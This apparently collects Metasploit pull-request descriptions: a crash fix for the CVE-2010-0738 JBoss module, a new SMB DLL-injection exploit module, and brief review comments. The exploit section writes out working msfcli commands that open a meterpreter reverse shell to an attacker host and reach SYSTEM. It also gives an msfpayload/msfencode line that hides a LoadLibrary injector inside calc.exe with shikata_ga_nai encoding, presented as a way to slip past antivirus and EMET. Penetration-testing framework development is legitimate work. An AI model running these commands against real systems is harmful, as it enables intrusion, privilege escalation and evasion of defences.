The exploit against CVE-2010-0738 won't work when using GET or POST. In the existing code the request would fail and the function would return nil. This would be passed to detect_platform without being checked and cause the module to crash ungracefully with the error:
Exploit failed: NoMethodError undefined method `body' for nil:NilClass
The first changes detect a 401 authentication message and provide useful feedback. If, in any case, 'res' is not a valid or useful response, the second change just terminates processing.
I've stayed with the module's coding style for consistency.
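A small Ruby illustration of the guard described above, added here and not the module's own code; the Response struct and detect_platform are stand-ins for the Rex HTTP response object and the module's method:

```ruby
# Stand-in for the Rex HTTP response (constructed for this example; the real
# object exposes the same .code and .body accessors).
Response = Struct.new(:code, :body)

# Stand-in for the module's detect_platform: it touches res.body at once,
# so a nil response raises NoMethodError exactly as described above.
def detect_platform(res)
  res.body =~ /Linux/ ? :linux : :windows
end

# Unguarded flow, as in the original module: nil reaches detect_platform
# and the module dies with "undefined method `body' for nil:NilClass".
def check_unguarded(res)
  detect_platform(res)
end

# Guarded flow: give useful feedback on a 401, stop on any other missing or
# unusable response, and only then detect the platform.
def check_guarded(res)
  return :auth_required if res && res.code == 401   # feedback to the user
  return :no_response unless res && res.body        # terminate processing

  detect_platform(res)
end

if __FILE__ == $0
  [nil, Response.new(401, ''), Response.new(200, 'Linux 2.6 jboss')].each do |r|
    puts check_guarded(r).inspect
  end
end
```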
This is an implementation of using the SMBFileServer mixin to perform DLL injection over SMB.

Exploitation can be performed by starting the dllinjector exploit, which will remain resident until a DLL is downloaded and a session created. By generating an executable using the windows/loadlibrary payload it is possible to test the SMBServer mixin on various platforms, but it also serves as a novel injection method where LoadLibrary calls are not being filtered by Antivirus or EMET.
Example Run
```
# msfcli exploits/windows/smb/dllinjector PAYLOAD=windows/meterpreter/reverse_tcp SHARE=share DLL=exploit.dll LHOST=172.32.255.1 LPORT=4444 SRVHOST=172.32.255.1 E
[*] Initializing modules...
PAYLOAD => windows/meterpreter/reverse_tcp
SHARE => share
DLL => exploit.dll
LHOST => 172.32.255.1
LPORT => 4444
SRVHOST => 172.32.255.1
[*] Started reverse handler on 172.32.255.1:4444
[*] Generating our malicious dll...
[*] Starting SMB Server on: \\172.32.255.1\share\exploit.dll
[*] Sending stage (769536 bytes) to 172.32.255.128
[*] Meterpreter session 1 opened (172.32.255.1:4444 -> 172.32.255.128:1186) at 2014-04-24 11:18:55 +0100
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
Reproduction Steps
* Generate dllinjector executable (non-malicious)
```
msfpayload windows/loadlibrary DLL="\\\\1.2.3.4\\share\\exploit.dll" R | msfencode -b '\x00' -t exe -x calc.exe -k -o dllinjector.exe -e x86/shikata_ga_nai -c 3
```
* Run DLL Injection server
```
msfcli exploits/windows/smb/dllinjector PAYLOAD=windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=4444 SRVHOST=1.2.3.4 SHARE=share DLL=exploit.dll E
```
* Execute dllinjector.exe on the target host
* Monitor the generated traffic in Wireshark
* Enjoy shells.
Verification
* Land #3074
* Land #3075
* Generate loadlibrary executable
* Load dllinjector with payload
* Run executable on target

Tested on:
* Windows 7 (x86/x64)
* Windows Server 2003
* Windows Server 2008
There are three total, and they're all copy-pasted from the original module from 2009. I suspect this idiom isn't used at all any more -- I can't detect a difference in the payload if I just declare a host being cli.peerhost, rather than rewriting RHOST to be cli.peerhost.
[SeeRM #8498]
This looks okay from debug (the host looks like it's generating okay) but there may be some subtle thing I'm not seeing here. @wchen-r7 can you glance at this please?
[SeeRM #8498]